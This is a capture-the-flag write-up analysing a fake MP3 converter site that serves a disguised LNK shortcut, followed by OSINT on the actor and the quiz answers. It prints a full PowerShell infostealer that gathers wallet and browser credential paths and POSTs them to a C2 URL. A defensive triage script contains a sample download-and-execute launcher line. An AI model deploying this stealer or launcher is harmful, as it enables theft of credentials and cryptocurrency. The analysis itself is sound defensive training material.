Day 1

Maybe SOC-mas music, he thought, doesn't come from a store?

In this challenge, we investigated a malicious website masquerading as a YouTube-to-MP3 converter. The task involved identifying hidden malicious files, analyzing a PowerShell script, and uncovering clues leading to the identity of the malicious actor "M.M." through poor OPSEC practices.

Story for the challenge

Start the Machine and wait for it to deploy

Navigate to the provided IP; we find a YouTube MP3/MP4 converter.

The Youtube video converter website

Give it a sample YouTube video link and convert it to MP3; we get a file named download.zip. Extracting it reveals two files: song.mp3 and somg.mp3.

Check what type of files these are:

$ file song.mp3

song.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

Let's check the other file

$ file somg.mp3

somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID win-base-2019, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat Sep 15 01:44:14 2018, atime=Sat Sep 15 01:44:14 2018, mtime=Sat Sep 15 01:44:14 2018, length=448000, window=normal, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Despite its .mp3 extension, this file is a Windows shortcut (LNK) whose target is powershell.exe. That is suspicious; let's investigate further.

Exif information

The shortcut's target is a PowerShell command line: it downloads the IS.ps1 script and runs it with iex (Invoke-Expression), so the script executes as soon as the shortcut is opened.
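As an added example (not part of the original writeup), a small triage script that does what `file` did for us above, but in a form a defender can automate: it identifies the real type of each extracted file from its magic bytes, flags files whose content disagrees with the .mp3 extension, and pulls indicator strings (PowerShell, iex, download cmdlets, URLs) out of any LNK it finds. The indicator names and the sample byte strings are constructed for the demo; the placeholder URL stands in for the real one.

```python
import re
import struct

# Constants from the MS-SHLLINK specification: every .lnk starts with
# HeaderSize = 0x4C followed by the ShellLink CLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER_SIZE = struct.pack("<I", 0x4C)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Hypothetical indicator patterns; the names are ours, not from the challenge.
INDICATORS = {
    "powershell": r"\bpowershell(\.exe)?\b",
    "iex": r"\b(iex|invoke-expression)\b",
    "irm": r"\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b",
    "bypass": r"\bbypass\b",
    "url": r"https?://\S+",
}

def classify(data: bytes) -> str:
    """Identify content by magic bytes, ignoring whatever extension the file carries."""
    if data[:4] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID:
        return "lnk"
    # An ID3v2 tag or a raw MPEG frame sync (11 set bits) both mean real MP3 audio.
    if data[:3] == b"ID3" or (len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0):
        return "mp3"
    return "unknown"

def lnk_indicators(data: bytes) -> list[str]:
    """Decode the shortcut's UTF-16LE strings and report which indicator patterns appear."""
    # LNK string data is UTF-16LE; decode at both byte alignments so odd offsets are not missed.
    text = "".join(data[off:].decode("utf-16-le", errors="ignore") for off in (0, 1)).lower()
    return [name for name, pat in INDICATORS.items() if re.search(pat, text)]

def triage(filename: str, data: bytes) -> dict:
    """Flag files whose real type disagrees with the .mp3 extension, and inspect LNKs."""
    kind = classify(data)
    return {
        "file": filename,
        "detected_type": kind,
        "extension_mismatch": filename.lower().endswith(".mp3") and kind != "mp3",
        "indicators": lnk_indicators(data) if kind == "lnk" else [],
    }

# Constructed samples (not the challenge's real files): a bare ID3v2.3 header,
# and an LNK header followed by a launcher command line with a placeholder URL.
SAMPLE_SONG = b"ID3\x03\x00\x00" + b"\x00" * 32
SAMPLE_SOMG = (LNK_HEADER_SIZE + LNK_CLSID + b"\x00" * (0x4C - 20)
               + 'powershell.exe -ep Bypass -nop -c "iex (irm https://example.invalid/IS.ps1)"'.encode("utf-16-le"))

if __name__ == "__main__":
    for name, blob in (("song.mp3", SAMPLE_SONG), ("somg.mp3", SAMPLE_SOMG)):
        print(triage(name, blob))
```

Run against the two extracted files instead of the constructed samples, song.mp3 classifies as mp3 while somg.mp3 is reported as an LNK with an extension mismatch and PowerShell indicators.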

The IS.ps1 file (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1)

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

This script is designed to collect highly sensitive information from the victim’s system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker’s remote server.

It searches for cryptocurrency wallet files and browser credential databases, records what it finds in stolen_info.txt, and POSTs that file to a Command & Control (C2) server at http://papash3ll.thm/data.

The script contained an ASCII art signature:

"Created by the one and only M.M."

Searching for this signature on GitHub.com gives this result:

Github search result

Looking through the search results, you can infer the malicious actor's identity from the information on the project's page and in its GitHub Issues section.

Issues

The real name of M.M. can be found in his GitHub README file:

MM's readme.md

Also check the number of commits made on the repo where the issue was raised:

Commits

Questions

1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?

A: Tyler Ramsbey

2. The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?

A: http://papash3ll.thm/data

3. Who is M.M? Maybe his Github profile page would provide clues?

A: Mayor Malware

4. What is the number of commits on the GitHub repo where the issue was raised?

A: 1

5. If you enjoyed this task, feel free to check out the OPSEC room!

A: No answer needed

6. What's with all these GitHub repos? Could they hide something else?

A: No answer needed

Thank you!
